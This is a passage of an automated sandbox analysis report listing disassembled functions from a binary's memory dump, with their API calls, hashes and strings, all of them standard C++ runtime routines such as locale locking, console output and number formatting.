                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: b3d52d6316d65adbe8946fbc47bc5412f592d43b10b7be0850b7111d99f2a319
                                                                                    • Instruction ID: 710e0287a81e6e14319dbf280ed65b70c3757d7d1cc5d733c7c972f7627df373
                                                                                    • Opcode Fuzzy Hash: b3d52d6316d65adbe8946fbc47bc5412f592d43b10b7be0850b7111d99f2a319
                                                                                    • Instruction Fuzzy Hash: 7501C035901119DBCB15EBA498816BE77E0EF80710F650489F5146B3D2CF709F00EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42EA5
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42EAF
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42F00
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42F20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: e330d2a1dea591162821c5893fd40fb7d8e4c06c7d9db6772e557f1d8bb8d9f7
                                                                                    • Instruction ID: 5db7d14ca3e227b2770afed835e6c62a48eeb06a15e1f392bbf117d839ad1955
                                                                                    • Opcode Fuzzy Hash: e330d2a1dea591162821c5893fd40fb7d8e4c06c7d9db6772e557f1d8bb8d9f7
                                                                                    • Instruction Fuzzy Hash: 9C016D31900619DBCB15EB649845ABE77F1BF84710FA505C9F514AB2D2CF709F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42E10
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42E1A
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42E6B
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42E8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: c1f0f04c5ca2802055c7bef70febab0923f954f3668035d63eedc71202362d57
                                                                                    • Instruction ID: 5ac23f8d5802ece97f4a6545598df6d702a161139c8bd7af916b9f16a00d4672
                                                                                    • Opcode Fuzzy Hash: c1f0f04c5ca2802055c7bef70febab0923f954f3668035d63eedc71202362d57
                                                                                    • Instruction Fuzzy Hash: FF01AD32940619DBCB15EB64C841AAEB7E1EF94710F6409C9F914AB2A2CF709F05EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42F3A
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42F44
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42F95
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42FB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 4a63dcacb28dbe1addeec10c49df04eec90bcf61558422402ff22a46e5543b4d
                                                                                    • Instruction ID: 831ded32ed29532db5e133d07ce718d5564fde7d81279b627588aec0a3f1ae33
                                                                                    • Opcode Fuzzy Hash: 4a63dcacb28dbe1addeec10c49df04eec90bcf61558422402ff22a46e5543b4d
                                                                                    • Instruction Fuzzy Hash: 36018B359105159BCB15ABA48841AAEBBF1AF94710F640589F414AB292CF709F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B73053,?,00000001,?,?,?,00B72198,?,?,00000000), ref: 00B7369D
                                                                                    • GetLastError.KERNEL32(?,00B73053,?,00000001,?,?,?,00B72198,?,?,00000000,?,?,?,00B7271F,?), ref: 00B736A9
                                                                                      • Part of subcall function 00B7366F: CloseHandle.KERNEL32(FFFFFFFE,00B736B9,?,00B73053,?,00000001,?,?,?,00B72198,?,?,00000000,?,?), ref: 00B7367F
                                                                                    • ___initconout.LIBCMT ref: 00B736B9
                                                                                      • Part of subcall function 00B73631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B73660,00B73040,?,?,00B72198,?,?,00000000,?), ref: 00B73644
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B73053,?,00000001,?,?,?,00B72198,?,?,00000000,?), ref: 00B736CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 20f422770d5d228bcf84f1bd0f1a3f58c869a5021c23cb2597946d4ba9b382c6
                                                                                    • Instruction ID: 6e6ef5eeaa69269c5e2db9f108d31b811f13ae2d1979500160ee75b8673bb0f2
                                                                                    • Opcode Fuzzy Hash: 20f422770d5d228bcf84f1bd0f1a3f58c869a5021c23cb2597946d4ba9b382c6
                                                                                    • Instruction Fuzzy Hash: 1FF01C36548118BBCF222F95EC04D893FA6FB087A1B008090FE2D96230CE32C960FB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SleepConditionVariableCS.KERNELBASE(?,00B52CBD,00000064), ref: 00B52D43
                                                                                    • LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,00B52CBD,00000064,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52D4D
                                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00B52CBD,00000064,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52D5E
                                                                                    • EnterCriticalSection.KERNEL32(00B8DD3C,?,00B52CBD,00000064,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52D65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                    • String ID:
                                                                                    • API String ID: 3269011525-0
                                                                                    • Opcode ID: 9eb2914240aaf7ef090e0df3aa3cd198c090c838872171a5049b8e5f9847568d
                                                                                    • Instruction ID: 878f905ba8a8b78735851e426be127bbd1f6f50d40f656588147ba07f1917894
                                                                                    • Opcode Fuzzy Hash: 9eb2914240aaf7ef090e0df3aa3cd198c090c838872171a5049b8e5f9847568d
                                                                                    • Instruction Fuzzy Hash: 7DE01232585524BBCB163B54EC08A9A3F79EF05B51B0100F2F909671B2DE615941CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B3EC8E
                                                                                      • Part of subcall function 00B3D87C: __EH_prolog3.LIBCMT ref: 00B3D883
                                                                                      • Part of subcall function 00B3D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00B3D88D
                                                                                      • Part of subcall function 00B3D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D8FE
                                                                                    • _Find_elem.LIBCPMT ref: 00B3EE8A
                                                                                    Strings
                                                                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B3ECF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                    • API String ID: 2544715827-2799312399
                                                                                    • Opcode ID: 32317bde9cc986e68848f1d5d98c00aea36fbe28b800d23d52c71f45c95a8e9c
                                                                                    • Instruction ID: 0f92050ed42bd0be058f7f648d4a94331ee0bc9871c57b2b949f989074dd37b5
                                                                                    • Opcode Fuzzy Hash: 32317bde9cc986e68848f1d5d98c00aea36fbe28b800d23d52c71f45c95a8e9c
                                                                                    • Instruction Fuzzy Hash: 81C14034E042989AEF15DBA885907ACBBF2AF55300F3440EAE8A56B287CB71DD45CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B462C8
                                                                                      • Part of subcall function 00B42D74: __EH_prolog3.LIBCMT ref: 00B42D7B
                                                                                      • Part of subcall function 00B42D74: std::_Lockit::_Lockit.LIBCPMT ref: 00B42D85
                                                                                      • Part of subcall function 00B42D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00B42DF6
                                                                                    • _Find_elem.LIBCPMT ref: 00B46502
                                                                                    Strings
                                                                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B4633F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                    • API String ID: 2544715827-2799312399
                                                                                    • Opcode ID: e36d045aa8d5bb1386ff5fe7f2579b3ecf3fef5cf526070f663c95d0e5d7f9a2
                                                                                    • Instruction ID: 58e9c0b61380197e6bd3bfae69515c1b85f2612c7d7d2c2460bcbea036c6af23
                                                                                    • Opcode Fuzzy Hash: e36d045aa8d5bb1386ff5fe7f2579b3ecf3fef5cf526070f663c95d0e5d7f9a2
                                                                                    • Instruction Fuzzy Hash: 7EC17470E042588ADF25DF68C8417EDBBF1FF12704F5480D9D889AB286DB349E85EB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4669E
                                                                                      • Part of subcall function 00B3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B3B8DD
                                                                                      • Part of subcall function 00B3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B3B900
                                                                                      • Part of subcall function 00B3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B928
                                                                                      • Part of subcall function 00B3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B9B7
                                                                                    • _Find_elem.LIBCPMT ref: 00B468D8
                                                                                    Strings
                                                                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B46715
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                    • API String ID: 3042121994-2799312399
                                                                                    • Opcode ID: 8a9c1f047ce90f68546e19ccc81af223cfe12b5f3111dfb38a2c956f61e6bfc7
                                                                                    • Instruction ID: 97c776df4347d46108dbe37f86d12d57a08c878e9cf0ca73238f68940b46ab7f
                                                                                    • Opcode Fuzzy Hash: 8a9c1f047ce90f68546e19ccc81af223cfe12b5f3111dfb38a2c956f61e6bfc7
                                                                                    • Instruction Fuzzy Hash: F2C18530E042588BDF25DF64C8917ACBBF1FF56304F5480DAD8896B282DB749E85EB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 3732870572-1956417402
                                                                                    • Opcode ID: ef0d9ce8b82b24e0559b45620a1cdf2e25ca6358f50309bcb227da7bde8f5f74
                                                                                    • Instruction ID: 82bc20f2dc11617419ae4e8b201f60f30511e611ee7c04bf300f1f2ebea17297
                                                                                    • Opcode Fuzzy Hash: ef0d9ce8b82b24e0559b45620a1cdf2e25ca6358f50309bcb227da7bde8f5f74
                                                                                    • Instruction Fuzzy Hash: C251D330B05385AADF268F6CC8857BE7BF99F06352F1848DAEC91D7281C7748949CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00B3BF6E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                    • String ID: false$true
                                                                                    • API String ID: 118556049-2658103896
                                                                                    • Opcode ID: 01c45e10819989bb0baa4d7d4ab101c7e7e7b24a10f3cac10eb1677dbaffe4f5
                                                                                    • Instruction ID: 96b9abf9ab023805d7be8f385f5a6881b9d53d84e7ea52fdbcdab0ec788a7a6a
                                                                                    • Opcode Fuzzy Hash: 01c45e10819989bb0baa4d7d4ab101c7e7e7b24a10f3cac10eb1677dbaffe4f5
                                                                                    • Instruction Fuzzy Hash: F051C6B1D007589FDB10DFA4C841BEEBBF8FF05304F1446AAE945AB241E774AA85CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \\?\$\\?\UNC\
                                                                                    • API String ID: 0-3019864461
                                                                                    • Opcode ID: f3a63823b708c3d8fbf06f3c54e79bed7b92e81a649d464b519cc674419a1175
                                                                                    • Instruction ID: e3ec0f6a63b239eaf8aeb510d87b6b2cc02b0112af8bce3b8fb407eaceed567e
                                                                                    • Opcode Fuzzy Hash: f3a63823b708c3d8fbf06f3c54e79bed7b92e81a649d464b519cc674419a1175
                                                                                    • Instruction Fuzzy Hash: 1051E4B1A546049BDB24DFA4C885BEEBBF5FF45304F20459DE801B7290DFB56988CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4D501
                                                                                    • _swprintf.LIBCMT ref: 00B4D573
                                                                                      • Part of subcall function 00B4254E: __EH_prolog3.LIBCMT ref: 00B42555
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B4255F
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B425D0
                                                                                      • Part of subcall function 00B42FC8: __EH_prolog3.LIBCMT ref: 00B42FCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                    • String ID: %.0Lf
                                                                                    • API String ID: 3050236999-1402515088
                                                                                    • Opcode ID: e9c1c9caaacf7099954b9c114615828df5ef206453aaf7e7a386164247698d36
                                                                                    • Instruction ID: ef8b54f7dce82b7da5e018eb3a1c18dc56d777de5d79d1661e48117d2ee2f7be
                                                                                    • Opcode Fuzzy Hash: e9c1c9caaacf7099954b9c114615828df5ef206453aaf7e7a386164247698d36
                                                                                    • Instruction Fuzzy Hash: C7415971D00218ABCF05EFE4C885ADD7BF5FF18300F208589E846AB295EB359A15DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4D7A5
                                                                                    • _swprintf.LIBCMT ref: 00B4D817
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38657
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38679
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B386A1
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3880E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                    • String ID: %.0Lf
                                                                                    • API String ID: 1487807907-1402515088
                                                                                    • Opcode ID: a58a9714921c1ebf832b6dde79e89a029c161ab70ed5b57ec8fad936c5223e5c
                                                                                    • Instruction ID: c156395591369605c67ffa566dd2d2e3022c4d245886ee27606afd0e55b3fa2a
                                                                                    • Opcode Fuzzy Hash: a58a9714921c1ebf832b6dde79e89a029c161ab70ed5b57ec8fad936c5223e5c
                                                                                    • Instruction Fuzzy Hash: AC416971E00318ABCF06DFE4D845AEE7BB5FF08300F208499E855AB295EB359A15DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B5188E
                                                                                    • _swprintf.LIBCMT ref: 00B51900
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392A0
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392C2
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B392EA
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B39422
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                    • String ID: %.0Lf
                                                                                    • API String ID: 1487807907-1402515088
                                                                                    • Opcode ID: 27bfbfaa6835112a886cc187d3953debf8ec20e7af5e9cfea4689b40bec93102
                                                                                    • Instruction ID: 86e30a59abc9f9f5a2536c72b34dd0b4c1a65d6c5bbfbcbb077e55523f1de74b
                                                                                    • Opcode Fuzzy Hash: 27bfbfaa6835112a886cc187d3953debf8ec20e7af5e9cfea4689b40bec93102
                                                                                    • Instruction Fuzzy Hash: 6D416971E00208ABCF05DFD4D855BDD7BB5FF08300F208589E956AB2A5DB359A19CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B5607E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
